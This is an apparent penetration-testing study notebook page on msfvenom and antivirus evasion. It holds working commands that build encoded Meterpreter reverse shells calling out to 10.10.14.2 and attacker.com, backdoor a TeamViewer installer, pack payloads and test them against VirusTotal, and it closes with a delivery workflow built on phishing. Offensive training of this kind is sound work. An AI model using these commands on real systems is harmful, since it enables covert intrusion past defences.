<!DOCTYPE HTML>
<html lang="en" class="light sidebar-visible" dir="ltr">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>msfvenom - notebook</title>


        <!-- Custom HTML head -->
        <link rel="icon" href="theme/logo.png">
        

        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff">

        <link rel="icon" href="../favicon-de23e50b.svg">
        <link rel="shortcut icon" href="../favicon-8114d1fc.png">
        <link rel="stylesheet" href="../css/variables-8adf115d.css">
        <link rel="stylesheet" href="../css/general-2459343d.css">
        <link rel="stylesheet" href="../css/chrome-9dfbd86b.css">
        <link rel="stylesheet" href="../css/print-9e4910d8.css" media="print">

        <!-- Fonts -->
        <link rel="stylesheet" href="../fonts/fonts-9644e21d.css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" id="mdbook-highlight-css" href="../highlight-493f70e1.css">
        <link rel="stylesheet" id="mdbook-tomorrow-night-css" href="../tomorrow-night-4c0ae647.css">
        <link rel="stylesheet" id="mdbook-ayu-highlight-css" href="../ayu-highlight-3fdfc3ac.css">

        <!-- Custom theme stylesheets -->
        <link rel="stylesheet" href="../theme/custom-e80eafda.css">


        <!-- Provide site root and default themes to javascript -->
        <script>
            const path_to_root = "../";
            const default_light_theme = "light";
            const default_dark_theme = "navy";
            window.path_to_searchindex_js = "../searchindex-ce326670.js";
        </script>
        <!-- Start loading toc.js asap -->
        <script src="../toc-0412fd45.js"></script>
    </head>
    <body>
    <div id="mdbook-help-container">
        <div id="mdbook-help-popup">
            <h2 class="mdbook-help-title">Keyboard shortcuts</h2>
            <div>
                <p>Press <kbd>←</kbd> or <kbd>→</kbd> to navigate between chapters</p>
                <p>Press <kbd>S</kbd> or <kbd>/</kbd> to search in the book</p>
                <p>Press <kbd>?</kbd> to show this help</p>
                <p>Press <kbd>Esc</kbd> to hide this help</p>
            </div>
        </div>
    </div>
    <div id="mdbook-body-container">
        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script>
            try {
                let theme = localStorage.getItem('mdbook-theme');
                let sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script>
            const default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? default_dark_theme : default_light_theme;
            let theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
            if (theme === null || theme === undefined) { theme = default_theme; }
            const html = document.documentElement;
            html.classList.remove('light')
            html.classList.add(theme);
            html.classList.add("js");
        </script>

        <input type="checkbox" id="mdbook-sidebar-toggle-anchor" class="hidden">

        <!-- Hide / unhide sidebar before it is displayed -->
        <script>
            let sidebar = null;
            const sidebar_toggle = document.getElementById("mdbook-sidebar-toggle-anchor");
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            } else {
                sidebar = 'hidden';
                sidebar_toggle.checked = false;
            }
            if (sidebar === 'visible') {
                sidebar_toggle.checked = true;
            } else {
                html.classList.remove('sidebar-visible');
            }
        </script>

        <nav id="mdbook-sidebar" class="sidebar" aria-label="Table of contents">
            <!-- populated by js -->
            <mdbook-sidebar-scrollbox class="sidebar-scrollbox"></mdbook-sidebar-scrollbox>
            <noscript>
                <iframe class="sidebar-iframe-outer" src="../toc.html"></iframe>
            </noscript>
            <div id="mdbook-sidebar-resize-handle" class="sidebar-resize-handle">
                <div class="sidebar-resize-indicator"></div>
            </div>
        </nav>

        <div id="mdbook-page-wrapper" class="page-wrapper">

            <div class="page">
                <a href="https://rnemeth90.github.io" class="back-to-blog">
                    🏠 Back to Blog
                </a>
                
                <div id="mdbook-menu-bar-hover-placeholder"></div>
                <div id="mdbook-menu-bar" class="menu-bar sticky">
                    <div class="left-buttons">
                        <label id="mdbook-sidebar-toggle" class="icon-button" for="mdbook-sidebar-toggle-anchor" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="mdbook-sidebar">
                            <span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M0 96C0 78.3 14.3 64 32 64H416c17.7 0 32 14.3 32 32s-14.3 32-32 32H32C14.3 128 0 113.7 0 96zM0 256c0-17.7 14.3-32 32-32H416c17.7 0 32 14.3 32 32s-14.3 32-32 32H32c-17.7 0-32-14.3-32-32zM448 416c0 17.7-14.3 32-32 32H32c-17.7 0-32-14.3-32-32s14.3-32 32-32H416c17.7 0 32 14.3 32 32z"/></svg></span>
                        </label>
                        <button id="mdbook-theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="mdbook-theme-list">
                            <span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M371.3 367.1c27.3-3.9 51.9-19.4 67.2-42.9L600.2 74.1c12.6-19.5 9.4-45.3-7.6-61.2S549.7-4.4 531.1 9.6L294.4 187.2c-24 18-38.2 46.1-38.4 76.1L371.3 367.1zm-19.6 25.4l-116-104.4C175.9 290.3 128 339.6 128 400c0 3.9 .2 7.8 .6 11.6c1.8 17.5-10.2 36.4-27.8 36.4H96c-17.7 0-32 14.3-32 32s14.3 32 32 32H240c61.9 0 112-50.1 112-112c0-2.5-.1-5-.2-7.5z"/></svg></span>
                        </button>
                        <ul id="mdbook-theme-list" class="theme-popup" aria-label="Themes" role="menu">
                            <li role="none"><button role="menuitem" class="theme" id="mdbook-theme-default_theme">Auto</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="mdbook-theme-light">Light</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="mdbook-theme-rust">Rust</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="mdbook-theme-coal">Coal</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="mdbook-theme-navy">Navy</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="mdbook-theme-ayu">Ayu</button></li>
                        </ul>
                        <button id="mdbook-search-toggle" class="icon-button" type="button" title="Search (`/`)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="/ s" aria-controls="mdbook-searchbar">
                            <span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M416 208c0 45.9-14.9 88.3-40 122.7L502.6 457.4c12.5 12.5 12.5 32.8 0 45.3s-32.8 12.5-45.3 0L330.7 376c-34.4 25.2-76.8 40-122.7 40C93.1 416 0 322.9 0 208S93.1 0 208 0S416 93.1 416 208zM208 352c79.5 0 144-64.5 144-144s-64.5-144-144-144S64 128.5 64 208s64.5 144 144 144z"/></svg></span>
                        </button>
                    </div>

                    <h1 class="menu-title">notebook</h1>

                    <div class="right-buttons">
                        <a href="../print.html" title="Print this book" aria-label="Print this book">
                            <span class=fa-svg id="print-button"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M128 0C92.7 0 64 28.7 64 64v96h64V64H354.7L384 93.3V160h64V93.3c0-17-6.7-33.3-18.7-45.3L400 18.7C388 6.7 371.7 0 354.7 0H128zM384 352v32 64H128V384 368 352H384zm64 32h32c17.7 0 32-14.3 32-32V256c0-35.3-28.7-64-64-64H64c-35.3 0-64 28.7-64 64v96c0 17.7 14.3 32 32 32H64v64c0 35.3 28.7 64 64 64H384c35.3 0 64-28.7 64-64V384zm-16-88c-13.3 0-24-10.7-24-24s10.7-24 24-24s24 10.7 24 24s-10.7 24-24 24z"/></svg></span>
                        </a>

                    </div>
                </div>

                <div id="mdbook-search-wrapper" class="hidden">
                    <form id="mdbook-searchbar-outer" class="searchbar-outer">
                        <div class="search-wrapper">
                            <input type="search" id="mdbook-searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="mdbook-searchresults-outer" aria-describedby="searchresults-header">
                            <div class="spinner-wrapper">
                                <span class=fa-svg id="fa-spin"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M304 48c0-26.5-21.5-48-48-48s-48 21.5-48 48s21.5 48 48 48s48-21.5 48-48zm0 416c0-26.5-21.5-48-48-48s-48 21.5-48 48s21.5 48 48 48s48-21.5 48-48zM48 304c26.5 0 48-21.5 48-48s-21.5-48-48-48s-48 21.5-48 48s21.5 48 48 48zm464-48c0-26.5-21.5-48-48-48s-48 21.5-48 48s21.5 48 48 48s48-21.5 48-48zM142.9 437c18.7-18.7 18.7-49.1 0-67.9s-49.1-18.7-67.9 0s-18.7 49.1 0 67.9s49.1 18.7 67.9 0zm0-294.2c18.7-18.7 18.7-49.1 0-67.9S93.7 56.2 75 75s-18.7 49.1 0 67.9s49.1 18.7 67.9 0zM369.1 437c18.7 18.7 49.1 18.7 67.9 0s18.7-49.1 0-67.9s-49.1-18.7-67.9 0s-18.7 49.1 0 67.9z"/></svg></span>
                            </div>
                        </div>
                    </form>
                    <div id="mdbook-searchresults-outer" class="searchresults-outer hidden">
                        <div id="mdbook-searchresults-header" class="searchresults-header"></div>
                        <ul id="mdbook-searchresults">
                        </ul>
                    </div>
                </div>

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script>
                    document.getElementById('mdbook-sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('mdbook-sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#mdbook-sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="mdbook-content" class="content">
                    <main>
                        <h1 id="msfvenom"><a class="header" href="#msfvenom">msfvenom</a></h1>
<p>Understanding how targets are defended helps attack them more efficiently and quietly. Defense mechanisms fall into two main categories: <strong>Endpoint Protection</strong> and <strong>Perimeter Protection</strong>.</p>
<hr>
<h2 id="endpoint-protection"><a class="header" href="#endpoint-protection">Endpoint Protection</a></h2>
<p>Endpoint protection refers to localized device or service protection for a single host on the network. The host can be a personal computer, corporate workstation, or server in a DMZ.</p>
<h3 id="common-components"><a class="header" href="#common-components">Common Components</a></h3>
<p>Endpoint protection usually comes as software packages that include:</p>
<ul>
<li><strong>Antivirus Protection</strong> - Signature-based malware detection</li>
<li><strong>Antimalware Protection</strong> - Bloatware, spyware, adware, scareware, ransomware</li>
<li><strong>Host Firewall</strong> - Local traffic filtering</li>
<li><strong>Anti-DDoS</strong> - Denial of service protection</li>
</ul>
<h3 id="popular-endpoint-protection-products"><a class="header" href="#popular-endpoint-protection-products">Popular Endpoint Protection Products</a></h3>
<ul>
<li>Avast</li>
<li>Nod32</li>
<li>Malwarebytes</li>
<li>BitDefender</li>
<li>Windows Defender</li>
<li>ClamAV</li>
</ul>
<hr>
<h2 id="perimeter-protection"><a class="header" href="#perimeter-protection">Perimeter Protection</a></h2>
<p>Perimeter protection comes in physical or virtualized devices on the network perimeter edge. These edge devices provide access inside the network from the outside (public to private).</p>
<h3 id="network-zones"><a class="header" href="#network-zones">Network Zones</a></h3>
<div class="table-wrapper">
<table>
<thead>
<tr><th>Zone</th><th>Description</th><th>Trust Level</th></tr>
</thead>
<tbody>
<tr><td><strong>Outside</strong></td><td>The Internet, public networks</td><td>Lowest</td></tr>
<tr><td><strong>DMZ</strong></td><td>Public-facing servers (web, email, DNS)</td><td>Medium</td></tr>
<tr><td><strong>Inside</strong></td><td>Internal corporate network</td><td>Highest</td></tr>
</tbody>
</table>
</div>
<p>The DMZ houses servers that push and pull data for public clients from the Internet but are managed from the inside network.</p>
<hr>
<h2 id="security-policies"><a class="header" href="#security-policies">Security Policies</a></h2>
<p>Security policies function like ACLs (Access Control Lists) - essentially allow and deny statements that dictate how traffic or files can exist within a network boundary.</p>
<h3 id="policy-types"><a class="header" href="#policy-types">Policy Types</a></h3>
<div class="table-wrapper">
<table>
<thead>
<tr><th>Policy Type</th><th>Description</th></tr>
</thead>
<tbody>
<tr><td><strong>Network Traffic Policies</strong></td><td>Control packet flow based on ports, protocols, IPs</td></tr>
<tr><td><strong>Application Policies</strong></td><td>Control which applications can run</td></tr>
<tr><td><strong>User Access Control Policies</strong></td><td>Define user permissions and authentication</td></tr>
<tr><td><strong>File Management Policies</strong></td><td>Control file access, modification, transfer</td></tr>
<tr><td><strong>DDoS Protection Policies</strong></td><td>Rate limiting, traffic shaping</td></tr>
</tbody>
</table>
</div>
<hr>
<h2 id="detection-methods"><a class="header" href="#detection-methods">Detection Methods</a></h2>
<h3 id="signature-based-detection"><a class="header" href="#signature-based-detection">Signature-based Detection</a></h3>
<p>Compares network packets against pre-built attack pattern signatures. Any 100% match generates alarms.</p>
<p><strong>Pros:</strong></p>
<ul>
<li>Very accurate for known threats</li>
<li>Low false positive rate</li>
</ul>
<p><strong>Cons:</strong></p>
<ul>
<li>Cannot detect new/unknown attacks</li>
<li>Requires constant signature updates</li>
</ul>
<h3 id="heuristicstatistical-anomaly-detection"><a class="header" href="#heuristicstatistical-anomaly-detection">Heuristic/Statistical Anomaly Detection</a></h3>
<p>Behavioral comparison against an established baseline, including APT (Advanced Persistent Threat) signatures.</p>
<p><strong>Detection Approach:</strong></p>
<ol>
<li>Establish baseline of normal network behavior</li>
<li>Identify commonly used protocols</li>
<li>Generate alarms when deviations exceed threshold</li>
</ol>
<h3 id="stateful-protocol-analysis-detection"><a class="header" href="#stateful-protocol-analysis-detection">Stateful Protocol Analysis Detection</a></h3>
<p>Recognizes divergence of protocols by event comparison using pre-built profiles of generally accepted non-malicious activity definitions.</p>
<h3 id="live-monitoring-and-alerting-soc-based"><a class="header" href="#live-monitoring-and-alerting-soc-based">Live-monitoring and Alerting (SOC-based)</a></h3>
<p>Security Operations Center (SOC) analysts use live-feed software to monitor network activity and intermediate alarming systems for potential threats.</p>
<hr>
<h2 id="evasion-techniques"><a class="header" href="#evasion-techniques">Evasion Techniques</a></h2>
<h3 id="payload-encoding"><a class="header" href="#payload-encoding">Payload Encoding</a></h3>
<p>Most host-based antivirus software relies on signature-based detection. Encoding payloads can help evade these signatures.</p>
<h4 id="generate-encoded-payload"><a class="header" href="#generate-encoded-payload">Generate Encoded Payload</a></h4>
<pre><code class="language-bash">msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
  -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5
</code></pre>
<p><strong>Output:</strong></p>
<pre><code>Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 27 (iteration=0)
x86/shikata_ga_nai succeeded with size 54 (iteration=1)
x86/shikata_ga_nai succeeded with size 81 (iteration=2)
x86/shikata_ga_nai succeeded with size 108 (iteration=3)
x86/shikata_ga_nai succeeded with size 135 (iteration=4)
x86/shikata_ga_nai chosen with final size 135
Payload size: 135 bytes
Saved as: /home/user/test.js
</code></pre>
<p><strong>Note:</strong> Simply encoding payloads with multiple iterations is often not sufficient for all AV products.</p>
<h3 id="encrypted-communication-channels"><a class="header" href="#encrypted-communication-channels">Encrypted Communication Channels</a></h3>
<p>MSF6 can tunnel AES-encrypted communication from Meterpreter shells back to the attacker, successfully encrypting traffic as the payload is sent.</p>
<p><strong>Benefits:</strong></p>
<ul>
<li>Evades network-based IDS/IPS</li>
<li>Meterpreter runs in memory (no file on disk)</li>
</ul>
<h3 id="executable-templates-backdoored-executables"><a class="header" href="#executable-templates-backdoored-executables">Executable Templates (Backdoored Executables)</a></h3>
<p>msfvenom can embed payloads into legitimate executable files, hiding shellcode deep within legitimate code.</p>
<h4 id="create-backdoored-executable"><a class="header" href="#create-backdoored-executable">Create Backdoored Executable</a></h4>
<pre><code class="language-bash">msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
  -k -x ~/Downloads/TeamViewer_Setup.exe \
  -e x86/shikata_ga_nai -a x86 --platform windows \
  -o ~/Desktop/TeamViewer_Setup.exe -i 5
</code></pre>
<p><strong>Output:</strong></p>
<pre><code>Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 27 (iteration=0)
x86/shikata_ga_nai succeeded with size 54 (iteration=1)
x86/shikata_ga_nai succeeded with size 81 (iteration=2)
x86/shikata_ga_nai succeeded with size 108 (iteration=3)
x86/shikata_ga_nai succeeded with size 135 (iteration=4)
x86/shikata_ga_nai chosen with final size 135
Payload size: 135 bytes
Saved as: /home/user/Desktop/TeamViewer_Setup.exe
</code></pre>
<h4 id="key-flags"><a class="header" href="#key-flags">Key Flags</a></h4>
<div class="table-wrapper">
<table>
<thead>
<tr><th>Flag</th><th>Description</th></tr>
</thead>
<tbody>
<tr><td><code>-k</code></td><td>Keep template’s normal execution flow (payload runs in separate thread)</td></tr>
<tr><td><code>-x &lt;file&gt;</code></td><td>Specify executable template</td></tr>
<tr><td><code>-e &lt;encoder&gt;</code></td><td>Encoder to use</td></tr>
<tr><td><code>-i &lt;iterations&gt;</code></td><td>Number of encoding passes</td></tr>
<tr><td><code>-a &lt;arch&gt;</code></td><td>Target architecture</td></tr>
<tr><td><code>--platform</code></td><td>Target platform</td></tr>
</tbody>
</table>
</div>
<p><strong>Note:</strong> With <code>-k</code> flag, the original application runs normally while the payload executes in a separate thread. However, if launched from CLI, a separate window may pop up for the payload.</p>
<hr>
<h2 id="archives-for-evasion"><a class="header" href="#archives-for-evasion">Archives for Evasion</a></h2>
<p>Password-protected archives bypass many common AV signatures because the scanner cannot inspect the contents.</p>
<h3 id="creating-protected-archives"><a class="header" href="#creating-protected-archives">Creating Protected Archives</a></h3>
<pre><code class="language-bash"># ZIP with password
zip -e -P password payload.zip payload.exe

# 7-Zip with password
7z a -pPassword123 payload.7z payload.exe
</code></pre>
<p><strong>Considerations:</strong></p>
<ul>
<li>Files will be flagged as “unable to scan” in AV dashboards</li>
<li>Administrators may manually inspect locked archives</li>
<li>Effective for initial delivery when combined with social engineering</li>
</ul>
<hr>
<h2 id="packers"><a class="header" href="#packers">Packers</a></h2>
<p>Packers compress and obfuscate executables by packing the payload with decompression code into a single file. When run, the decompression code restores the original executable transparently.</p>
<h3 id="popular-packers"><a class="header" href="#popular-packers">Popular Packers</a></h3>
<div class="table-wrapper">
<table>
<thead>
<tr><th>Packer</th><th>Description</th></tr>
</thead>
<tbody>
<tr><td><strong>UPX</strong></td><td>Universal packer, widely used</td></tr>
<tr><td><strong>The Enigma Protector</strong></td><td>Windows executable protection</td></tr>
<tr><td><strong>MPRESS</strong></td><td>Compact packer for PE/ELF/Mach-O</td></tr>
<tr><td><strong>Alternate EXE Packer</strong></td><td>Simple Windows packer</td></tr>
<tr><td><strong>ExeStealth</strong></td><td>Anti-debugging features</td></tr>
<tr><td><strong>MEW</strong></td><td>Minimal size packer</td></tr>
<tr><td><strong>Themida</strong></td><td>Advanced code virtualization</td></tr>
<tr><td><strong>Morphine</strong></td><td>Polymorphic packer</td></tr>
</tbody>
</table>
</div>
<h3 id="upx-usage"><a class="header" href="#upx-usage">UPX Usage</a></h3>
<pre><code class="language-bash"># Compress executable
upx -9 payload.exe -o packed.exe

# Maximum compression with --ultra-brute
upx --ultra-brute payload.exe -o packed.exe

# Decompress (for analysis)
upx -d packed.exe
</code></pre>
<p><strong>Reference:</strong> Check out the <a href="https://github.com/polypack">PolyPack project</a> for more packer information.</p>
<hr>
<h2 id="virustotal-analysis"><a class="header" href="#virustotal-analysis">VirusTotal Analysis</a></h2>
<p>Use Metasploit’s built-in VirusTotal integration to test detection rates:</p>
<pre><code class="language-bash">msf-virustotal -k &lt;API_key&gt; -f test.js
</code></pre>
<p><strong>Sample Output:</strong></p>
<pre><code>[*] Using API key: &lt;API key&gt;
[*] Please wait while I upload test.js...
[*] VirusTotal: Scan request successfully queued
[*] Sample MD5 hash    : 35e7687f0793dc3e048d557feeaf615a
[*] Sample SHA1 hash   : f2f1c4051d8e71df0741b40e4d91622c4fd27309
[*] Analysis link: https://www.virustotal.com/gui/file/&lt;SNIP&gt;/detection
[*] Analysis Report: test.js (11 / 59)
</code></pre>
<h3 id="detection-rates-example"><a class="header" href="#detection-rates-example">Detection Rates Example</a></h3>
<div class="table-wrapper">
<table>
<thead>
<tr><th>Antivirus</th><th>Detected</th><th>Result</th></tr>
</thead>
<tbody>
<tr><td>AVG</td><td>true</td><td>Win32:ShikataGaNai-A [Trj]</td></tr>
<tr><td>Avast</td><td>true</td><td>Win32:ShikataGaNai-A [Trj]</td></tr>
<tr><td>BitDefender</td><td>true</td><td>Exploit.Metacoder.Shikata.Gen</td></tr>
<tr><td>ClamAV</td><td>true</td><td>Win.Trojan.MSShellcode-6360729-0</td></tr>
<tr><td>ESET-NOD32</td><td>false</td><td>-</td></tr>
<tr><td>Kaspersky</td><td>false</td><td>-</td></tr>
<tr><td>Malwarebytes</td><td>false</td><td>-</td></tr>
</tbody>
</table>
</div>
<hr>
<h2 id="exploit-code-considerations"><a class="header" href="#exploit-code-considerations">Exploit Code Considerations</a></h2>
<h3 id="offset-randomization"><a class="header" href="#offset-randomization">Offset Randomization</a></h3>
<p>When coding exploits, add randomization to break IPS/IDS database signatures for well-known exploit buffers:</p>
<pre><code class="language-ruby">'Targets' =&gt;
[
 [ 'Windows 2000 SP4 English', { 'Ret' =&gt; 0x77e14c29, 'Offset' =&gt; 5093 } ],
],
</code></pre>
<h3 id="avoid-obvious-nop-sleds"><a class="header" href="#avoid-obvious-nop-sleds">Avoid Obvious NOP Sleds</a></h3>
<p>IPS/IDS regularly check for standard NOP sleds. Test custom exploit code against a sandbox before deployment.</p>
<h3 id="buffer-overflow-considerations"><a class="header" href="#buffer-overflow-considerations">Buffer Overflow Considerations</a></h3>
<ul>
<li>Typical BoF exploits are easily distinguished by hexadecimal buffer patterns</li>
<li>Use randomized shellcode encoding</li>
<li>Vary NOP equivalents (NOPs can be replaced with other single-byte instructions)</li>
</ul>
<hr>
<h2 id="msf6-encrypted-sessions"><a class="header" href="#msf6-encrypted-sessions">MSF6 Encrypted Sessions</a></h2>
<h3 id="https-meterpreter-with-stage-encoding"><a class="header" href="#https-meterpreter-with-stage-encoding">HTTPS Meterpreter with Stage Encoding</a></h3>
<pre><code class="language-bash">use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set EnableStageEncoding true
set StageEncoder x64/xor
run -j
</code></pre>
<h3 id="benefits"><a class="header" href="#benefits">Benefits</a></h3>
<ul>
<li>AES-encrypted tunnel between Meterpreter and attacker</li>
<li>Payload runs in memory (harder to detect)</li>
<li>Encrypted traffic blends with normal HTTPS traffic</li>
</ul>
<hr>
<h2 id="dns-exfiltration"><a class="header" href="#dns-exfiltration">DNS Exfiltration</a></h2>
<p>In cases with strict traffic rules, DNS can be used for data exfiltration. This technique was notably used in the Equifax breach of 2017.</p>
<h3 id="characteristics"><a class="header" href="#characteristics">Characteristics</a></h3>
<ul>
<li>Slow but stealthy</li>
<li>Often allowed through firewalls</li>
<li>Difficult to detect without DNS-specific monitoring</li>
<li>Can bypass IP-based filtering</li>
</ul>
<h3 id="references"><a class="header" href="#references">References</a></h3>
<ul>
<li><a href="https://www.ftc.gov/equifax-data-breach">US Government Post-Mortem Report on Equifax Hack</a></li>
<li><a href="https://www.infoblox.com/">Protecting from DNS Exfiltration</a></li>
<li><a href="https://www.infoblox.com/">Stopping Data Exfil and Malware Spread through DNS</a></li>
</ul>
<hr>
<h2 id="evasion-workflow"><a class="header" href="#evasion-workflow">Evasion Workflow</a></h2>
<h3 id="step-1-choose-delivery-method"><a class="header" href="#step-1-choose-delivery-method">Step 1: Choose Delivery Method</a></h3>
<ul>
<li>Backdoored executable</li>
<li>Macro-enabled document</li>
<li>Script file (JS, VBS, PS1)</li>
<li>Archive with password</li>
</ul>
<h3 id="step-2-apply-obfuscation"><a class="header" href="#step-2-apply-obfuscation">Step 2: Apply Obfuscation</a></h3>
<pre><code class="language-bash"># Generate encoded backdoored executable
msfvenom -p windows/meterpreter/reverse_https LHOST=attacker.com LPORT=443 \
  -x legit_app.exe -k \
  -e x86/shikata_ga_nai -i 15 \
  -f exe -o trojan.exe
</code></pre>
<h3 id="step-3-pack-the-payload-optional"><a class="header" href="#step-3-pack-the-payload-optional">Step 3: Pack the Payload (Optional)</a></h3>
<pre><code class="language-bash">upx -9 trojan.exe -o trojan_packed.exe
</code></pre>
<h3 id="step-4-test-detection"><a class="header" href="#step-4-test-detection">Step 4: Test Detection</a></h3>
<pre><code class="language-bash">msf-virustotal -k &lt;API_key&gt; -f trojan_packed.exe
</code></pre>
<h3 id="step-5-setup-handler"><a class="header" href="#step-5-setup-handler">Step 5: Setup Handler</a></h3>
<pre><code class="language-bash">use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set EnableStageEncoding true
run -j
</code></pre>
<h3 id="step-6-deliver-and-execute"><a class="header" href="#step-6-deliver-and-execute">Step 6: Deliver and Execute</a></h3>
<ul>
<li>Social engineering</li>
<li>Phishing email</li>
<li>Physical access</li>
<li>Exploit existing vulnerability</li>
</ul>
<hr>
<h2 id="important-notes"><a class="header" href="#important-notes">Important Notes</a></h2>
<ol>
<li><strong>Testing Environment</strong>: Always test evasion techniques in a sandbox before live deployment</li>
<li><strong>Single Chance</strong>: During assessments, you may only have one opportunity to succeed</li>
<li><strong>Signature Updates</strong>: AV vendors regularly update signatures for known tools</li>
<li><strong>Layered Approach</strong>: Combine multiple evasion techniques for better results</li>
<li><strong>Legal Compliance</strong>: Only use these techniques during authorized penetration tests</li>
</ol>
<hr>
<h2 id="additional-resources"><a class="header" href="#additional-resources">Additional Resources</a></h2>
<ul>
<li><a href="https://nostarch.com/metasploit">Metasploit - The Penetration Tester’s Guide</a> - No Starch Press</li>
<li><a href="https://github.com/polypack">PolyPack Project</a> - Packer research</li>
<li><a href="https://github.com/Veil-Framework/Veil">Veil Framework</a> - Payload generation framework</li>
<li><a href="https://www.shellterproject.com/">Shellter</a> - Dynamic shellcode injection</li>
</ul>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->
                            <a rel="prev" href="../tools/metasploit.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                                <span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M41.4 233.4c-12.5 12.5-12.5 32.8 0 45.3l160 160c12.5 12.5 32.8 12.5 45.3 0s12.5-32.8 0-45.3L109.3 256 246.6 118.6c12.5-12.5 12.5-32.8 0-45.3s-32.8-12.5-45.3 0l-160 160z"/></svg></span>
                            </a>

                            <a rel="next prefetch" href="../tools/john.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                                <span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M278.6 233.4c12.5 12.5 12.5 32.8 0 45.3l-160 160c-12.5 12.5-32.8 12.5-45.3 0s-12.5-32.8 0-45.3L210.7 256 73.4 118.6c-12.5-12.5-12.5-32.8 0-45.3s32.8-12.5 45.3 0l160 160z"/></svg></span>
                            </a>

                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">
                    <a rel="prev" href="../tools/metasploit.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
